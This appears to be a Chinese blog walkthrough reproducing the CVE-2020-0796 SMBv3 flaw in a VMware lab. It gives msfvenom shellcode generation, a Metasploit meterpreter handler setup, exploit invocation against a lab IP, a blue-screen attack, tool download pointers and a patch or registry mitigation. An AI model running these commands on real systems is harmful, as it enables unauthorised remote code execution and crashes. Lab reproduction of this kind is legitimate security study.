MySQL数据库从入门到实战应用
CVE-2020-0796
Microsoft服务器消息块3.1.1(SMBv3)协议处理某些请求的方式中存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。
受影响的系统版本
适用于32位系统的Windows 10版本1903
Windows 10 1903版(用于基于x64的系统)
Windows 10 1903版(用于基于ARM64的系统)
Windows Server 1903版(服务器核心安装)
适用于32位系统的Windows 10版本1909
Windows 10版本1909(用于基于x64的系统)
Windows 10 1909版(用于基于ARM64的系统)
Windows Server版本1909(服务器核心安装)
环境搭建
我用的是VMware搭建
环境版本信息
漏洞检测-扫描
漏洞复现-返回会话
工具下载:
CSDN
GItHub
该Exp使用python3
1.启动msf
使用msf生成shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp lport=3333 -f py -o shellcode.txt
执行该命令后会在桌面生成一个shellcode.txt
将生成的shellcode替换exp中的exploit.py中的USER_PAYLOAD保存即可。
2.使用kaili中的msf开启监听
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp #设置反弹模式
msf5 exploit(multi/handler) > set rhost 172.18.9.24
msf5 exploit(multi/handler) > set lport 3333 #设置监听端口 端口需与上面生成的shellcode一致
msf5 exploit(multi/handler) > run
3.在kali Exp文件夹下执行
python3 exploit.py -ip 172.18.9.24
4.获得会话 复现成功
漏洞复现-蓝屏攻击
工具下载
CSDN
目标主机蓝屏
视频演示
Getshell
https://www.bilibili.com/video/BV1ZK4y1x7JL/
漏洞修复
下载补丁并安装补丁链接
也可以使用PowerShell命令禁用SMBv3服务的压缩
Set-ItemProperty -Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” DisableCompression -Type DWORD -Value 1 –Force